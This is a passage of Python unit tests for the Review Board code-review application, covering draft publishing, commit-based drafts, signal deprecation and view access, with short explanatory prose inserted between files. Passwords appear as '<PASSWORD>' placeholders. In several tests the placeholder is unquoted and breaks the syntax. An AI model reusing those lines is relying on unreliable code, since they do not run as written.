class SpecialRichField(BaseTextAreaField):
# Exercise special case field name 'text'
field_id = 'text'
class BasicField(BaseEditableField):
field_id = 'basic_field'
fieldset = get_review_request_fieldset('main')
fieldset.add_field(RichField)
fieldset.add_field(SpecialRichField)
fieldset.add_field(BasicField)
try:
draft = self._get_draft()
review_request = draft.review_request
draft.description = 'New description'
draft.extra_data['rich_field'] = '**Rich custom text**'
draft.extra_data['rich_field_text_type'] = 'markdown'
draft.extra_data['text'] = 'Nothing special'
draft.extra_data['text_type'] = 'plain'
draft.extra_data['basic_field'] = 'Basic text'
draft.publish()
self.assertNotIn('description_text_type',
review_request.extra_data)
self.assertIn('rich_field', review_request.extra_data)
self.assertIn('rich_field_text_type', review_request.extra_data)
self.assertIn('text', review_request.extra_data)
self.assertIn('text_type', review_request.extra_data)
self.assertIn('basic_field', review_request.extra_data)
self.assertNotIn('basic_field_text_type',
review_request.extra_data)
self.assertEqual(review_request.description, draft.description)
self.assertEqual(review_request.extra_data['rich_field'],
draft.extra_data['rich_field'])
self.assertEqual(review_request.extra_data['rich_field_text_type'],
draft.extra_data['rich_field_text_type'])
self.assertEqual(review_request.extra_data['text'],
draft.extra_data['text'])
self.assertEqual(review_request.extra_data['text_type'],
draft.extra_data['text_type'])
self.assertEqual(review_request.extra_data['basic_field'],
draft.extra_data['basic_field'])
finally:
fieldset.remove_field(RichField)
fieldset.remove_field(SpecialRichField)
fieldset.remove_field(BasicField)
def _get_draft(self):
"""Convenience function for getting a new draft to work with."""
review_request = self.create_review_request(publish=True)
return ReviewRequestDraft.create(review_request)
class PostCommitTests(SpyAgency, TestCase):
"""Unit tests for post-commit support in ReviewRequestDraft."""
fixtures = ['test_users', 'test_scmtools']
def setUp(self):
super(PostCommitTests, self).setUp()
self.user = User.objects.create(username='testuser', password='')
self.profile, is_new = Profile.objects.get_or_create(user=self.user)
self.profile.save()
self.testdata_dir = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'..', 'scmtools', 'testdata')
self.repository = self.create_repository(tool_name='Test')
def test_update_from_committed_change(self):
"""Testing ReviewRequestDraft.update_from_commit_id with committed
change
"""
commit_id = '4'
def get_change(repository, commit_to_get):
self.assertEqual(commit_id, commit_to_get)
commit = Commit(message='This is my commit message\n\n'
'With a summary line too.')
diff_filename = os.path.join(self.testdata_dir, 'git_readme.diff')
with open(diff_filename, 'r') as f:
commit.diff = f.read()
return commit
review_request = ReviewRequest.objects.create(self.user,
self.repository)
draft = ReviewRequestDraft.create(review_request)
self.spy_on(draft.repository.get_change, call_fake=get_change)
self.spy_on(draft.repository.get_file_exists)
draft.update_from_commit_id(commit_id)
self.assertFalse(draft.repository.get_file_exists.called)
self.assertEqual(review_request.summary, '')
self.assertEqual(review_request.description, '')
self.assertEqual(draft.summary, 'This is my commit message')
self.assertEqual(draft.description, 'With a summary line too.')
self.assertEqual(review_request.diffset_history.diffsets.count(), 0)
self.assertIsNotNone(draft.diffset)
self.assertEqual(draft.diffset.files.count(), 1)
filediff = draft.diffset.files.get()
self.assertEqual(filediff.source_file, 'readme')
self.assertEqual(filediff.source_revision, 'd6613f5')
def test_update_from_committed_change_with_rich_text_reset(self):
"""Testing ReviewRequestDraft.update_from_commit_id resets rich text
fields
"""
def get_change(repository, commit_to_get):
commit = Commit(
message='* This is a summary\n\n* This is a description.')
diff_filename = os.path.join(self.testdata_dir, 'git_readme.diff')
with open(diff_filename, 'r') as f:
commit.diff = f.read()
return commit
review_request = ReviewRequest.objects.create(self.user,
self.repository)
draft = ReviewRequestDraft.create(review_request)
self.spy_on(draft.repository.get_change, call_fake=get_change)
self.spy_on(draft.repository.get_file_exists)
draft.description_rich_text = True
draft.update_from_commit_id('4')
self.assertFalse(draft.repository.get_file_exists.called)
self.assertEqual(draft.summary, '* This is a summary')
self.assertEqual(draft.description, '* This is a description.')
self.assertFalse(draft.description_rich_text)
self.assertFalse(review_request.description_rich_text)
def test_update_from_pending_change_with_rich_text_reset(self):
"""Testing ReviewRequestDraft.update_from_pending_change resets rich
text fields
"""
review_request = ReviewRequest.objects.create(self.user,
self.repository)
draft = ReviewRequestDraft.create(review_request)
draft.description_rich_text = True
draft.testing_done_rich_text = True
changeset = ChangeSet()
changeset.changenum = 4
changeset.summary = '* This is a summary'
changeset.description = '* This is a description.'
changeset.testing_done = '* This is some testing.'
draft.update_from_pending_change(4, changeset)
self.assertEqual(draft.summary, '* This is a summary')
self.assertEqual(draft.description, '* This is a description.')
self.assertFalse(draft.description_rich_text)
self.assertEqual(draft.testing_done, '* This is some testing.')
self.assertFalse(draft.testing_done_rich_text)
def test_update_from_committed_change_without_repository_support(self):
"""Testing ReviewRequestDraft.update_from_commit_id without
supports_post_commit for repository
"""
self.spy_on(self.repository.__class__.supports_post_commit.fget,
call_fake=lambda self: False)
review_request = ReviewRequest.objects.create(self.user,
self.repository)
draft = ReviewRequestDraft.create(review_request)
with self.assertRaises(NotImplementedError):
draft.update_from_commit_id('4')
```
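The committed-change tests above encode a simple contract: `update_from_commit_id()` takes the commit message's first line as the draft summary and the remainder, with surrounding blank lines stripped, as the description (and the rich-text flags are reset). The split itself can be pictured with a short sketch; `split_commit_message` is a hypothetical helper written only to illustrate that contract, not Review Board's actual parsing code:

```python
def split_commit_message(message):
    """Split a commit message into (summary, description): the first
    line becomes the summary, everything after it (stripped of leading
    and trailing whitespace) becomes the description."""
    parts = message.split('\n', 1)
    summary = parts[0].strip()
    description = parts[1].strip() if len(parts) > 1 else ''

    return summary, description


assert split_commit_message(
    'This is my commit message\n\nWith a summary line too.') == (
    'This is my commit message', 'With a summary line too.')

assert split_commit_message(
    '* This is a summary\n\n* This is a description.') == (
    '* This is a summary', '* This is a description.')
```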
#### File: reviews/tests/test_signals.py
```python
from __future__ import unicode_literals
from django.utils import six
from djblets.testing.decorators import add_fixtures
from kgb import SpyAgency
from reviewboard.reviews.models import ReviewRequest
from reviewboard.reviews.signals import (review_request_closed,
review_request_closing)
from reviewboard.testing import TestCase
class DeprecatedSignalArgsTests(SpyAgency, TestCase):
"""Tests for deprecated signal arguments."""
@add_fixtures(['test_users'])
def test_review_request_closed(self):
"""Testing review_request_closing signal has deprecated type argument
"""
def review_request_closed_cb(close_type, **kwargs):
self.assertIn('type', kwargs)
type_ = kwargs['type']
with self.assert_warns():
self.assertEqual(six.text_type(type_), close_type)
self.spy_on(review_request_closed_cb)
review_request_closed.connect(review_request_closed_cb,
sender=ReviewRequest)
review_request = self.create_review_request(publish=True)
try:
review_request.close(ReviewRequest.SUBMITTED)
finally:
review_request_closed.disconnect(review_request_closed_cb)
self.assertTrue(review_request_closed_cb.spy.called)
@add_fixtures(['test_users'])
def test_review_request_closing(self):
"""Testing review_request_closing signal has deprecated type argument
"""
def review_request_closing_cb(close_type, **kwargs):
self.assertIn('type', kwargs)
type_ = kwargs['type']
with self.assert_warns():
self.assertEqual(six.text_type(type_), close_type)
self.spy_on(review_request_closing_cb)
review_request_closing.connect(review_request_closing_cb,
sender=ReviewRequest)
review_request = self.create_review_request(publish=True)
try:
review_request.close(ReviewRequest.SUBMITTED)
finally:
review_request_closing.disconnect(review_request_closing_cb)
self.assertTrue(review_request_closing_cb.spy.called)
```
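The two tests above pin down the deprecation behaviour of the closing signals: `close_type` is the supported argument, while the legacy `type` keyword is still sent and warns when used. A handler written against this API should therefore read `close_type` and leave `type` alone; the sketch below shows that shape (the handler name is made up, and `review_request` is read defensively from `**kwargs`):

```python
from reviewboard.reviews.models import ReviewRequest
from reviewboard.reviews.signals import review_request_closed


def on_review_request_closed(sender, close_type=None, **kwargs):
    """Illustrative receiver: consume close_type and ignore the
    deprecated 'type' argument that still arrives in **kwargs."""
    review_request = kwargs.get('review_request')

    if review_request is not None and close_type == ReviewRequest.SUBMITTED:
        # React to the review request being submitted here.
        pass


review_request_closed.connect(on_review_request_closed,
                              sender=ReviewRequest)
```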
#### File: reviews/tests/test_views.py
```python
from __future__ import unicode_literals
from datetime import timedelta
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from djblets.siteconfig.models import SiteConfiguration
from djblets.testing.decorators import add_fixtures
from reviewboard.extensions.tests import TestService
from reviewboard.hostingsvcs.service import (register_hosting_service,
unregister_hosting_service)
from reviewboard.hostingsvcs.models import HostingServiceAccount
from reviewboard.reviews.models import (Comment,
GeneralComment,
Review)
from reviewboard.site.urlresolvers import local_site_reverse
from reviewboard.testing import TestCase
class ViewTests(TestCase):
"""Tests for views in reviewboard.reviews.views."""
fixtures = ['test_users', 'test_scmtools', 'test_site']
def setUp(self):
super(ViewTests, self).setUp()
self.siteconfig = SiteConfiguration.objects.get_current()
self.siteconfig.set('auth_require_sitewide_login', False)
self.siteconfig.save()
def test_review_detail_redirect_no_slash(self):
"""Testing review_detail view redirecting with no trailing slash"""
response = self.client.get('/r/1')
self.assertEqual(response.status_code, 301)
def test_review_detail(self):
"""Testing review_detail view"""
review_request = self.create_review_request(publish=True)
response = self.client.get('/r/%d/' % review_request.id)
self.assertEqual(response.status_code, 200)
request = self._get_context_var(response, 'review_request')
self.assertEqual(request.pk, review_request.pk)
def test_review_detail_context(self):
"""Testing review_detail view's context"""
# Make sure this request is made while logged in, to catch the
# login-only pieces of the review_detail view.
self.client.login(username='admin', password='<PASSWORD>')
username = 'admin'
summary = 'This is a test summary'
description = 'This is my description'
testing_done = 'Some testing'
review_request = self.create_review_request(
publish=True,
submitter=username,
summary=summary,
description=description,
testing_done=testing_done)
response = self.client.get('/r/%s/' % review_request.pk)
self.assertEqual(response.status_code, 200)
request = self._get_context_var(response, 'review_request')
self.assertEqual(request.submitter.username, username)
self.assertEqual(request.summary, summary)
self.assertEqual(request.description, description)
self.assertEqual(request.testing_done, testing_done)
self.assertEqual(request.pk, review_request.pk)
def test_review_detail_diff_comment_ordering(self):
"""Testing review_detail and ordering of diff comments on a review"""
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
comment_text_3 = 'Comment text 3'
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
# Create the users who will be commenting.
user1 = User.objects.get(username='doc')
user2 = User.objects.get(username='dopey')
# Create the master review.
main_review = self.create_review(review_request, user=user1)
main_comment = self.create_diff_comment(main_review, filediff,
text=comment_text_1)
main_review.publish()
# First reply
reply1 = self.create_reply(
main_review,
user=user1,
timestamp=(main_review.timestamp + timedelta(days=1)))
self.create_diff_comment(reply1, filediff, text=comment_text_2,
reply_to=main_comment)
# Second reply
reply2 = self.create_reply(
main_review,
user=user2,
timestamp=(main_review.timestamp + timedelta(days=2)))
self.create_diff_comment(reply2, filediff, text=comment_text_3,
reply_to=main_comment)
# Publish them out of order.
reply2.publish()
reply1.publish()
# Make sure they published in the order expected.
self.assertTrue(reply1.timestamp > reply2.timestamp)
# Make sure they're looked up in the order expected.
comments = list(
Comment.objects
.filter(review__review_request=review_request)
.order_by('timestamp')
)
self.assertEqual(len(comments), 3)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_3)
self.assertEqual(comments[2].text, comment_text_2)
# Now figure out the order on the page.
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
entries = response.context['entries']
self.assertEqual(len(entries), 1)
entry = entries[0]
comments = entry.comments['diff_comments']
self.assertEqual(len(comments), 1)
self.assertEqual(comments[0].text, comment_text_1)
replies = comments[0].public_replies()
self.assertEqual(len(replies), 2)
self.assertEqual(replies[0].text, comment_text_3)
self.assertEqual(replies[1].text, comment_text_2)
def test_review_detail_general_comment_ordering(self):
"""Testing review_detail and ordering of general comments on a review
"""
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
comment_text_3 = 'Comment text 3'
review_request = self.create_review_request(create_repository=True,
publish=True)
# Create the users who will be commenting.
user1 = User.objects.get(username='doc')
user2 = User.objects.get(username='dopey')
# Create the master review.
main_review = self.create_review(review_request, user=user1)
main_comment = self.create_general_comment(main_review,
text=comment_text_1)
main_review.publish()
# First reply
reply1 = self.create_reply(
main_review,
user=user1,
timestamp=(main_review.timestamp + timedelta(days=1)))
self.create_general_comment(reply1, text=comment_text_2,
reply_to=main_comment)
# Second reply
reply2 = self.create_reply(
main_review,
user=user2,
timestamp=(main_review.timestamp + timedelta(days=2)))
self.create_general_comment(reply2, text=comment_text_3,
reply_to=main_comment)
# Publish them out of order.
reply2.publish()
reply1.publish()
# Make sure they published in the order expected.
self.assertTrue(reply1.timestamp > reply2.timestamp)
# Make sure they're looked up in the order expected.
comments = list(
GeneralComment.objects
.filter(review__review_request=review_request)
.order_by('timestamp')
)
self.assertEqual(len(comments), 3)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_3)
self.assertEqual(comments[2].text, comment_text_2)
def test_review_detail_file_attachment_visibility(self):
"""Testing visibility of file attachments on review requests"""
caption_1 = 'File Attachment 1'
caption_2 = 'File Attachment 2'
caption_3 = 'File Attachment 3'
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
user1 = User.objects.get(username='doc')
review_request = self.create_review_request()
# Add two file attachments. One active, one inactive.
file1 = self.create_file_attachment(review_request, caption=caption_1)
file2 = self.create_file_attachment(review_request, caption=caption_2,
active=False)
review_request.publish(user1)
# Create a third file attachment on a draft.
self.create_file_attachment(review_request, caption=caption_3,
draft=True)
# Create the review with comments for each screenshot.
review = Review.objects.create(review_request=review_request,
user=user1)
review.file_attachment_comments.create(file_attachment=file1,
text=comment_text_1)
review.file_attachment_comments.create(file_attachment=file2,
text=comment_text_2)
review.publish()
# Check that we can find all the objects we expect on the page.
self.client.login(username='doc', password='<PASSWORD>')
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
file_attachments = response.context['file_attachments']
self.assertEqual(len(file_attachments), 2)
self.assertEqual(file_attachments[0].caption, caption_1)
self.assertEqual(file_attachments[1].caption, caption_3)
# Make sure that other users won't see the draft one.
self.client.logout()
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
file_attachments = response.context['file_attachments']
self.assertEqual(len(file_attachments), 1)
self.assertEqual(file_attachments[0].caption, caption_1)
# Make sure we loaded the reviews and all data correctly.
entries = response.context['entries']
self.assertEqual(len(entries), 1)
entry = entries[0]
comments = entry.comments['file_attachment_comments']
self.assertEqual(len(comments), 2)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_2)
def test_review_detail_screenshot_visibility(self):
"""Testing visibility of screenshots on review requests"""
caption_1 = 'Screenshot 1'
caption_2 = 'Screenshot 2'
caption_3 = 'Screenshot 3'
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
user1 = User.objects.get(username='doc')
review_request = self.create_review_request()
# Add two screenshots. One active, one inactive.
screenshot1 = self.create_screenshot(review_request, caption=caption_1)
screenshot2 = self.create_screenshot(review_request, caption=caption_2,
active=False)
review_request.publish(user1)
# Add a third screenshot on a draft.
self.create_screenshot(review_request, caption=caption_3, draft=True)
# Create the review with comments for each screenshot.
user1 = User.objects.get(username='doc')
review = Review.objects.create(review_request=review_request,
user=user1)
review.screenshot_comments.create(screenshot=screenshot1,
text=comment_text_1,
x=10,
y=10,
w=20,
h=20)
review.screenshot_comments.create(screenshot=screenshot2,
text=comment_text_2,
x=0,
y=0,
w=10,
h=10)
review.publish()
# Check that we can find all the objects we expect on the page.
self.client.login(username='doc', password='<PASSWORD>')
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
screenshots = response.context['screenshots']
self.assertEqual(len(screenshots), 2)
self.assertEqual(screenshots[0].caption, caption_1)
self.assertEqual(screenshots[1].caption, caption_3)
# Make sure that other users won't see the draft one.
self.client.logout()
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
screenshots = response.context['screenshots']
self.assertEqual(len(screenshots), 1)
self.assertEqual(screenshots[0].caption, caption_1)
entries = response.context['entries']
self.assertEqual(len(entries), 1)
entry = entries[0]
# Make sure we loaded the reviews and all data correctly.
comments = entry.comments['screenshot_comments']
self.assertEqual(len(comments), 2)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_2)
def test_review_detail_sitewide_login(self):
"""Testing review_detail view with site-wide login enabled"""
self.siteconfig.set('auth_require_sitewide_login', True)
self.siteconfig.save()
self.create_review_request(publish=True)
response = self.client.get('/r/1/')
self.assertEqual(response.status_code, 302)
def test_new_review_request(self):
"""Testing new_review_request view"""
response = self.client.get('/r/new')
self.assertEqual(response.status_code, 301)
response = self.client.get('/r/new/')
self.assertEqual(response.status_code, 302)
self.client.login(username='grumpy', password='<PASSWORD>')
response = self.client.get('/r/new/')
self.assertEqual(response.status_code, 200)
# Bug 892
def test_interdiff(self):
"""Testing the diff viewer with interdiffs"""
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request, revision=1)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
self.create_filediff(
diffset,
source_file='/readme',
dest_file='/readme',
source_revision='d6613f5',
dest_detail='5b50866',
diff=(
b'diff --git a/readme b/readme\n'
b'index d6613f5..5b50866 100644\n'
b'--- a/readme\n'
b'+++ b/readme\n'
b'@@ -1 +1,3 @@\n'
b' Hello there\n'
b'+\n'
b'+Oh hi!\n'
))
self.create_filediff(
diffset,
source_file='/newfile',
dest_file='/newfile',
source_revision='PRE-CREATION',
dest_detail='',
diff=(
b'diff --git a/new_file b/new_file\n'
b'new file mode 100644\n'
b'index 0000000..ac30bd3\n'
b'--- /dev/null\n'
b'+++ b/new_file\n'
b'@@ -0,0 +1 @@\n'
b'+This is a new file!\n'
))
diffset = self.create_diffset(review_request, revision=2)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
self.create_filediff(
diffset,
source_file='/readme',
dest_file='/readme',
source_revision='d6613f5',
dest_detail='5b50867',
diff=(
b'diff --git a/readme b/readme\n'
b'index d6613f5..5b50867 100644\n'
b'--- a/readme\n'
b'+++ b/readme\n'
b'@@ -1 +1,3 @@\n'
b' Hello there\n'
b'+----------\n'
b'+Oh hi!\n'
))
self.create_filediff(
diffset,
source_file='/newfile',
dest_file='/newfile',
source_revision='PRE-CREATION',
dest_detail='',
diff=(
b'diff --git a/new_file b/new_file\n'
b'new file mode 100644\n'
b'index 0000000..ac30bd4\n'
b'--- /dev/null\n'
b'+++ b/new_file\n'
b'@@ -0,0 +1 @@\n'
b'+This is a different version of this new file!\n'
))
response = self.client.get('/r/1/diff/1-2/')
# Useful for debugging any actual errors here.
if response.status_code != 200:
print('Error: %s' % self._get_context_var(response, 'error'))
print(self._get_context_var(response, 'trace'))
self.assertEqual(response.status_code, 200)
self.assertEqual(
self._get_context_var(response, 'diff_context')['num_diffs'],
2)
files = self._get_context_var(response, 'files')
self.assertTrue(files)
self.assertEqual(len(files), 2)
self.assertEqual(files[0]['depot_filename'], '/newfile')
self.assertIn('interfilediff', files[0])
self.assertEqual(files[1]['depot_filename'], '/readme')
self.assertIn('interfilediff', files[1])
# Bug 847
def test_interdiff_new_file(self):
"""Testing the diff viewer with interdiffs containing new files"""
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request, revision=1)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
diffset = self.create_diffset(review_request, revision=2)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
self.create_filediff(
diffset,
source_file='/newfile',
dest_file='/newfile',
source_revision='PRE-CREATION',
dest_detail='',
diff=(
b'diff --git a/new_file b/new_file\n'
b'new file mode 100644\n'
b'index 0000000..ac30bd4\n'
b'--- /dev/null\n'
b'+++ b/new_file\n'
b'@@ -0,0 +1 @@\n'
b'+This is a different version of this new file!\n'
))
response = self.client.get('/r/1/diff/1-2/')
# Useful for debugging any actual errors here.
if response.status_code != 200:
print('Error: %s' % self._get_context_var(response, 'error'))
print(self._get_context_var(response, 'trace'))
self.assertEqual(response.status_code, 200)
self.assertEqual(
self._get_context_var(response, 'diff_context')['num_diffs'],
2)
files = self._get_context_var(response, 'files')
self.assertTrue(files)
self.assertEqual(len(files), 1)
self.assertEqual(files[0]['depot_filename'], '/newfile')
self.assertIn('interfilediff', files[0])
def test_review_request_etag_with_issues(self):
"""Testing review request ETags with issue status toggling"""
self.client.login(username='doc', password='<PASSWORD>')
# Some objects we need.
user = User.objects.get(username='doc')
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
# Create a review.
review = self.create_review(review_request, user=user)
comment = self.create_diff_comment(review, filediff,
issue_opened=True)
review.publish()
# Get the etag
response = self.client.get(review_request.get_absolute_url())
self.assertEqual(response.status_code, 200)
etag1 = response['ETag']
self.assertNotEqual(etag1, '')
# Change the issue status
comment.issue_status = Comment.RESOLVED
comment.save()
# Check the etag again
response = self.client.get(review_request.get_absolute_url())
self.assertEqual(response.status_code, 200)
etag2 = response['ETag']
self.assertNotEqual(etag2, '')
# Make sure they're not equal
self.assertNotEqual(etag1, etag2)
# Bug #3384
def test_diff_raw_content_disposition_attachment(self):
"""Testing /diff/raw/ Content-Disposition: attachment; ..."""
review_request = self.create_review_request(create_repository=True,
publish=True)
self.create_diffset(review_request=review_request)
response = self.client.get('/r/%d/diff/raw/' % review_request.pk)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Disposition'],
'attachment; filename=diffset')
# Bug #3704
def test_diff_raw_multiple_content_disposition(self):
"""Testing /diff/raw/ multiple Content-Disposition issue"""
review_request = self.create_review_request(create_repository=True,
publish=True)
# Create a diffset with a comma in its name.
self.create_diffset(review_request=review_request, name='test, comma')
response = self.client.get('/r/%d/diff/raw/' % review_request.pk)
content_disposition = response['Content-Disposition']
filename = content_disposition[len('attachment; filename='):]
self.assertFalse(',' in filename)
# Bug #4080
def test_bug_url_with_custom_scheme(self):
"""Testing whether bug url with non-HTTP scheme loads correctly"""
# Create a repository with a bug tracker that uses a non-standard
# url scheme.
repository = self.create_repository(public=True,
bug_tracker='scheme://bugid=%s')
review_request = self.create_review_request(repository=repository,
publish=True)
url = reverse('bug_url', args=(review_request.pk, '1'))
response = self.client.get(url)
# Test if we redirected to the correct url with correct bugID.
self.assertEqual(response['Location'], 'scheme://bugid=1')
def test_preview_review_request_email_access_with_debug(self):
"""Testing preview_review_request_email access with DEBUG=True"""
review_request = self.create_review_request(publish=True)
with self.settings(DEBUG=True):
response = self.client.get(
local_site_reverse(
'preview-review-request-email',
kwargs={
'review_request_id': review_request.pk,
'message_format': 'text',
}))
self.assertEqual(response.status_code, 200)
def test_preview_review_request_email_access_without_debug(self):
"""Testing preview_review_request_email access with DEBUG=False"""
review_request = self.create_review_request(publish=True)
with self.settings(DEBUG=False):
response = self.client.get(
local_site_reverse(
'preview-review-request-email',
kwargs={
'review_request_id': review_request.pk,
'message_format': 'text',
}))
self.assertEqual(response.status_code, 404)
def test_preview_review_request_email_with_valid_change_id(self):
"""Testing preview_review_request_email access with valid change ID"""
review_request = self.create_review_request(create_repository=True,
publish=True)
self.create_diffset(review_request, draft=True)
review_request.publish(review_request.submitter)
with self.settings(DEBUG=True):
response = self.client.get(
local_site_reverse(
'preview-review-request-email',
kwargs={
'review_request_id': review_request.pk,
'message_format': 'text',
'changedesc_id': review_request.changedescs.get().pk,
}))
self.assertEqual(response.status_code, 200)
def test_preview_review_request_email_with_invalid_change_id(self):
"""Testing preview_review_request_email access with invalid change ID
"""
review_request = self.create_review_request(create_repository=True,
publish=True)
self.create_diffset(review_request, draft=True)
review_request.publish(review_request.submitter)
with self.settings(DEBUG=True):
response = self.client.get(
local_site_reverse(
'preview-review-request-email',
kwargs={
'review_request_id': review_request.pk,
'message_format': 'text',
'changedesc_id': 100,
}))
self.assertEqual(response.status_code, 404)
def test_preview_review_email_access_with_debug(self):
"""Testing preview_review_email access with DEBUG=True"""
review_request = self.create_review_request(publish=True)
review = self.create_review(review_request, publish=True)
with self.settings(DEBUG=True):
response = self.client.get(
local_site_reverse(
'preview-review-email',
kwargs={
'review_request_id': review_request.pk,
'review_id': review.pk,
'message_format': 'text',
}))
self.assertEqual(response.status_code, 200)
def test_preview_review_email_access_without_debug(self):
"""Testing preview_review_email access with DEBUG=False"""
review_request = self.create_review_request(publish=True)
review = self.create_review(review_request, publish=True)
with self.settings(DEBUG=False):
response = self.client.get(
local_site_reverse(
'preview-review-email',
kwargs={
'review_request_id': review_request.pk,
'review_id': review.pk,
'message_format': 'text',
}))
self.assertEqual(response.status_code, 404)
def test_preview_review_reply_email_access_with_debug(self):
"""Testing preview_review_reply_email access with DEBUG=True"""
review_request = self.create_review_request(publish=True)
review = self.create_review(review_request, publish=True)
reply = self.create_reply(review, publish=True)
with self.settings(DEBUG=True):
response = self.client.get(
local_site_reverse(
'preview-review-reply-email',
kwargs={
'review_request_id': review_request.pk,
'review_id': review.pk,
'reply_id': reply.pk,
'message_format': 'text',
}))
self.assertEqual(response.status_code, 200)
def test_preview_review_reply_email_access_without_debug(self):
"""Testing preview_review_reply_email access with DEBUG=False"""
review_request = self.create_review_request(publish=True)
review = self.create_review(review_request, publish=True)
reply = self.create_reply(review, publish=True)
with self.settings(DEBUG=False):
response = self.client.get(
local_site_reverse(
'preview-review-reply-email',
kwargs={
'review_request_id': review_request.pk,
'review_id': review.pk,
'reply_id': reply.pk,
'message_format': 'text',
}))
self.assertEqual(response.status_code, 404)
def test_view_screenshot_access_with_valid_id(self):
"""Testing view_screenshot access with valid screenshot for review
request
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 200)
def test_view_screenshot_access_with_valid_id_and_draft(self):
"""Testing view_screenshot access with valid screenshot for review
request draft
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request, draft=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password='<PASSWORD>')
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 200)
def test_view_screenshot_access_with_valid_inactive_id(self):
"""Testing view_screenshot access with valid inactive screenshot for
review request
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request, active=False)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 200)
def test_view_screenshot_access_with_valid_inactive_id_and_draft(self):
"""Testing view_screenshot access with valid inactive screenshot for
review request draft
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request, draft=True,
active=False)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 200)
def test_view_screenshot_access_with_invalid_id(self):
"""Testing view_screenshot access with invalid screenshot for review
request
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request)
review_request2 = self.create_review_request(publish=True)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request2.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 404)
def test_view_screenshot_access_with_invalid_id_and_draft(self):
"""Testing view_screenshot access with invalid screenshot for review
request draft
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request, draft=True)
review_request2 = self.create_review_request(publish=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request2.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 404)
def test_view_screenshot_access_with_invalid_inactive_id(self):
"""Testing view_screenshot access with invalid inactive screenshot
for review request
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request, active=False)
review_request2 = self.create_review_request(publish=True)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request2.pk,
'screenshot_id': screenshot.pk,
